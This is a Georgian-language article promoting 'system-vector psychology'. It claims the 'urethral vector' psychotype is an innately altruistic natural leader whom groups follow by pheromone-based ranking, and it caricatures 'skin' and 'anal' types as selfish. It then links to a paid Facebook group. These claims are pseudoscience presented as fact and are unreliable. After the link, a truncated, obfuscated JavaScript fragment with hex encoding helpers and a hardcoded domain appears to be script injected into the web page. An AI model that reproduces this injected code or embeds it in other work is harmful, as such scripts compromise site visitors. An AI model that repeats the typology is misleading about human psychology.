ურეთრალური ვექტორის ფუძე

რატომაა ურეთრალური ვექტორი უსასრულო? იმიტომ რომ ის სხვანაირადაა მოწყობილი. არის ორი უსასრულო ფსიქიკის ფსიქოტიპი (ვექტორი), ერთი ზედა, მეორე ქვედა, სმენის ვექტორი და ურეთრალური. ისენი მოწყობილნი არიან გაცემაზე. სამივე ქვედა ვექტორი შიგნით მიღებაზეა მოწყობილი. კუნთის ვექტორი ჭამა, სმა, ძილი, სუნთქვა და მეტი არც არაფერი არ უნდა. კანის ვექტორს ფასდაკლებები ყველა მხრიდან, ყველგან, სულ ეცოტავება და კიდევ უნდა, სულ თავისთვის, სულ სარგებელი, ხეირი, გამორჩენა, მოგება, შემოსავალი. ანალური ვექტორისთვის ყველაფერი მხოლოდ ოჯახისთვის. როგორც არ უნდა ატრიალო ყველას ყველაფერი მაინც შიგნითკენ უნდათ. ამიტომაც არიან სასრულნი. ამიტომ ადვილია ტკბობის მიღება განსაკუთრებით განუვითარებელისთვის, მოიპარა ასი ლარი ნორმალურია რაა ამაში ცუდიო, კმაყოფილია ბედნიერია სულ რაღაც პატარა უნცია სიამოვნება მიიღო. ხოლო იმისთვის რომ მივიღოთ დიდი სიამოვნება, დიდი სამუშაოც უნდა გავწიოთ. როდესაც ინდივიდი შეიგრძნობს, რომ მან გასცა, მისცა სოციუმს რაღაც, მან ამით უფრო მეტ ტკბობაზე და კმაყოფილებაზე მიიღო უფლება. სწორედ ესაა ურეთრალური ვექტორის ფუძე: უსასრულო მომავალი, გაცემის თვისება.
ძალიან ბევრი ადამიანი სვამს კითხვას, კი მაგრამ როგორ უჯერებენ სხვები ურეთრალს? გასაგებია, რომ კანის ვექტორიანები ფიქრობენ: სხვები რომ მართო მათ უნდა უყვირო: გაინძერით თქვე უსაქმურებო, ხელფასს რაში იღბთო! შესაბამისად კანის ვექტორიანებს ურეთრალი ყველაზე თავხედი კანის ვექტორიანი გონიათ და ფიქრობენ, რომ ურეთრალიც მათსავით უნდა იქცეოდეს. ანალებს ურეთრალი ყველაზე ბრაზიანი და ბანჯგვლიანი ანალი მამრი გონიათ, რომლისაც ყველას ეშინია და ამიტომაც ემორჩილებიან. მაგრამ არაფერი მსგავსი, რეალურად ეს საკმაოდ უბრალოდ მუშაობს, ყველაფერი რანჟირდება ძალზე უბრალოდ, სუნებით (ფერომონებით). რას იძლევა ურეთრალის სუნი? ნებისმიერ ჯოგში, ნებისმიერი ანალის, ან კანის ვექტორიანი ფიქრობენ მხოლოდ საკუთარ თავზე და ყველა დანარჩენი ,,კიდიათ“. კანის ვექტორიანი ფიქრობს: მთავარია მე ვიყო კარგად და დანარჩენები თუნდაც ჩაძაღლდნენ. დღეს, კანურ ფაზაში ყველაფერი კანური ფასეულობებით იმართება. კანური კანონის წინაშე ყველანი გავთანასწორდით. კანური კანონი არ უყურებს ადამიანებს რეალური დანიშნულების მიხედვით. კანური კანონისთვის კუც, კურდღლიც, არწივიც და თევზიც თანასწორუფლებიანია და ყველას ერთნაირ დავალებას აძლევენ, სწორედ ამას უწოდებენ დემოკრატიას. სწორედ ასეთი პრინციპით უყურებს კანის ვექტორიანი სამართლიანობის ცნებას.
განვიხილოთ შემთხვევა, როდესაც ანალის ვექტორიანი და კანის ვექტორიანი აკეთებენ ბიზნესს. ანალის ვექტორიანი საქმის პროფესიონალია, დილიდან საღამომდე მუშაობს, კანის ვექტორიანი კი მის მუშაობას უკეთებს ორგანიზებას და ათი წელია ანალის ხარჯზე ცხოვრობს და ანალის ვექტორიანს მხოლოდ მიზერულ ხელფასს უხდის. იმიტომ რომ კანის ვექტორიანის აზროვნება მოწყობილია ასე: თუ გინდა წარმატებას მიაღწიო, ისწავლე ბზრიალი, თუ წარმატებას ვერ აღწევ, ე.ი. დამნაშავე შენ თვითონ ხარ! კანური კანონი ყველას თანაბარ შესაძლებლობას აძლევს ბიზნესის დასაწყებად, თუ არ შეგიძლია, ეს შენი პრობლემაა. კანის ვექტორიანი გონებაში არ არსებობს იმის გააზრება, რომ შეიძლება კანური კანონი თანაბარ შესაძლებლობებს აძლევს ყველას, მაგრამ ადამიანები ერთმანეთისაგან განსხვავდებიან. ყველას არ შეუძლია ამ კანონებს შეეწყოს, რადგან ყველა არ არის კანის ვექტორიანი. არც ანალის ვექტორიანს შეუძლია აღიქვას ადამიანებს შორის არსობრივი სხვაობა. ანალის ვექტორიანი მამა ყველა შვილისთვის ერთნაირ საჩუქარს ყიდულობს და სულ არ აინტერესებს ბავშვებს რა უნდათ. მაგრამ ჩვენ რეალურად ერთმანეთისაგან ფუნქციურად განვსხვავდებით. თანაც ყოველ ჩვენგანს სურს გადარჩეს და რეალიზდეს. ყოველი ჩვენთაგანი ერთიანდება ერთ კაცობრიობად და ვაკეთებთ ერთ საქმეს, მაშინ როდესაც საუბარი მომავალზეა. ყველას სურს ჰქონდეს მომავალი, მაგრამ მომავალი, ყველას მხოლოდ თავისთვის სურს. აქ კი არსებობს ადამიანი, ურეთრალის ვექტორიანი ბელადი (ასევე სმენის ვექტორიანიც), რომელიც ფიქრობს არა მხოლოდ საკუთარ თავზე, არამედ ყველაზე. ყველა თავისკენ ითრევს, ის კი ფიქრობს მთელ ჯოგზე და არის ყველა ადამიანის დამაკავშირებელი ძაფი. იმ აზრით, რომ ყველას სურს ჰქონდეს მომავალი, ურეთრალის ვექტორიანი კი ამ მომავლის გარანტია. ის მთელი ჯგუფის გარანტორია იმაში, რომ ყველა იმას მიიღებს რაც დაიმსახურა. ურეთრალის ვექტორიანი გარანტია, რომ უმოქმედო ანალის ვექტორიანი არ დარჩება ხორცის ნაჭრის გარეშე, მხოლოდ იმიტომ, რომ მას კანის ვექტორიანმა არ მისცა, ან წაგლიჯა. გარანტია იმისა, რომ ჯგუფის ყველა ბავშვი თანაბრად იქნება დაცული, რადგან ჯოგის ყველა ბავშვი მისი შვილია. რომ მოხდეს შემთხვევა და ჯოგი რაღაც დროით ურეთრალური ვექტორის გარეშე დარჩეს, კანის ვექტორიანი ასეთ დროს რესურსების უმეტეს ნაწილს თვითონ მიითვისებდა. სწორედ ამიტომ არის, რომ კანის ვექტორიანი სისტემურად ხელმძღვანელი არ არის და ჯოგი მას არ მიყვება. ურეთრალის ვექტრანი კი არ არის მომხვეჭელი, ის არ უყვირის ჯოგის წევრებს ეს გააკეთეო, არავის ემუქრება მუშტით. მაგრამ როდესაც ურეთრალი თავს ავლენს და ამბობს: ჩვენ უნდა წავიდეთ სანადიროდ, ან საომრად. ყველასთვის ნათელია, რომ ადამიანი, რომელიც არის მთელი ჯგუფის მომავლის გარანტორი, ჯგუფს არასწორი მიმართულებით არ წაიყვანს. ამიტომ მას ყველა უსიტყვოდ მიყვება, ეს ბუნებრივად რანჟირდება და ეს რანჟირება ხდება არაცნობიერით, სუნებით (ფერომონებით). ამის წყალობით ყველასთვის გასაგებია, რომ ურეთრალი განსაკუთრებულია და თუ მას გაყვებიან, ყველაფერი რიგზე იქნება, ამიტომ მიყვებიან.
და ბოლოს, შეჯამებისთვის. ურეთრალური ვექტორის ფუზეა – მომავალი. რაც გამოხატულია მისი ფსიქიკის განსაზღვრული თვისებებით, რასაც ჩვენ ვუწოდებთ ცხოველურ ალტრუიზმს (გაცემის თვისება).
არსებობს ადამიანური ალტრუიზმიც, ესაა სმენის ვექტორი, მაგრამ სმენის ვექტორის ალტრუიზმი არაა თანდაყოლილი, არამედ ესაა ალტრუიზმი რომელიც გამომუშავდება და ვითარდება, სწორედ ამას ეწოდება სმენის ვექტორიანის სულიერი გზა.
ურეთრალის ვექტორიანს კი თავისი ცხოველური ალტრუიზმი უბრალოდ თანდაყოლილი აქვს და ამას ვერაფერს მოუხერხებს. ურეთრალის ვექტორიანს არ შეუძლია დატკბეს გაცემის გარეშე. ის უბრალოდ ასეა მოწყობილი. ის ტკბობას ალტრუისტული მოქმედებით იღებს. ის გასცემს, იმისთვის რომ მიიღოს ტკბობა. ეს მას ამაღლებს სხვა ვექტორებზე და გამოარჩევს სხვებისაგან. ეს ის თვისებაა რომლითაც მუშაობს მისი პასუხისმგებლობა მთელ ჯოგზე. და ეს იძლევა გარანტირებულ მომავალს ყველა დანარჩენისათვის.

 

სრული ტექსტი იხილეთ ფასიან ჯგუფში: https://www.facebook.com/groups/571353209673619/?ref=bookmarks

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "svp.ge"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e